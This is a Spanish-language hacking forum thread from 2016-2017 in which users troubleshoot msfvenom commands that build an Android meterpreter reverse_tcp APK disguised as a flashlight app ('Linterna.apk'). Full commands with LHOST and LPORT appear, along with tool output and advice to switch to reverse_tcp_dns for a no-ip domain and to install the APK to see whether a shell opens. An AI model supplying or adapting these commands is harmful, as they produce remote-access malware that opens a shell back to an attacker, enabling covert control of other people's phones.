kali payload-apk error ?

Iniciado por redferne, Septiembre 13, 2016, 12:09:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 13, 2016, 12:09:07 PM Ultima modificación: Septiembre 13, 2016, 12:17:45 PM por Gabriela
hola:
el caso es que quiero hacer un payload-apk para android y metersela a mi movil para controlarlo...uso metaesploit pongo:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.193 LPORT=3456 R > /root/Desktop/Linterna.apk

  • exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.193 LPORT=3456 R > /root/Desktop/Linterna.apk

    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 7895 bytes

    me crea la apk pero no se si lo ha hecho bien, ya que me lanza ese texto, de que no he seleccionado plataforma....ya le pongo -p android...


    Ahora usando mi no-ip

    msf > msfvenom -p android/meterpreter/reverse_tcp LHOST=minoip LPORT=3456 R > /root/Desktop/Linterna2.apk

  • exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=minoip LPORT=3456 R > /root/Desktop/Linterna2.apk

    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    The following options failed to validate: LHOST.

    otra vez el mismo error mas la validacion del LHOST

    que hago mal ?

no pones "-p android", pones "-p android/meterpreter/reverse_tcp"

corre "msfvenom -h" y fijate que significa -p... es payload, no platform
hay otro switch para platform

igual no importa, el mensaje que te tira dice que se elige android automaticamente por el payload que elegiste. Lo mismo con la arquitectura

si no sabes si hiciste algo bien, probalo. El objetivo es ownear un android? instalale el apk y fijate si tenes una shell

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola:
el caso es que quiero hacer un payload-apk para android y metersela a mi movil para controlarlo...uso metaesploit pongo:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.193 LPORT=3456 R > /root/Desktop/Linterna.apk

  • exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.193 LPORT=3456 R > /root/Desktop/Linterna.apk

    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 7895 bytes

    me crea la apk pero no se si lo ha hecho bien, ya que me lanza ese texto, de que no he seleccionado plataforma....ya le pongo -p android...


    Ahora usando mi no-ip

    msf > msfvenom -p android/meterpreter/reverse_tcp LHOST=minoip LPORT=3456 R > /root/Desktop/Linterna2.apk

  • exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=minoip LPORT=3456 R > /root/Desktop/Linterna2.apk

    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    The following options failed to validate: LHOST.

    otra vez el mismo error mas la validacion del LHOST

    que hago mal ?
los 3 primeros errores es que no estas especificando la plataforma ni la arquitectura ni un tipo de codificacion, no e realizado paiload en .apk pero para windows a mi tambien me sale eso pero igual me funciona, para dart una idea si fuera para windows se deberia especificar la plataforma si es windows o que, en la arquitectura iria si es 32 o 64 bit y el coder es la codificacion que le das si es raw o cualquier otro, pero los supuestos errores como dices es xq como no especificas nada de ese metasploit automaticamente te los configura, pero de igual modo te va a funcionar, ahora lo de la noip es q noip utiliza dns en este caso deberia de ser asi, msfvenom -p android/meterpreter/reverse_tcp_dns y pones tu dominio no ip mas lo que falta te repito no e usado con android pero deberia ser igual intenta agregando el dns ya que noip usa dns ponlo asi reverse_tcp_dns
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses

Por partes:
Entonces funcionar funciona pero le faltan opciones....
podria poner alguien un ejemplo de como debería ser
con todas las opciones comentadas.....como referencia.

En cuanto a noip. Si lo pongo como dices no me daría
el mismo error de LHOST? O debo especificar
tambien un LHOST ...cual en tal caso?


Enero 19, 2017, 04:48:35 PM #4 Ultima modificación: Enero 20, 2017, 04:11:09 PM por Bronxi
Estimados,
Me sucede exactamente lo mismo que a redferné, es decir:

"No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload"

Probé la apk en un celular con android y tira "error al abrir el archivo". ¿Alguien me podrá (o nos podrá) dar una mano?
Muchas gracias,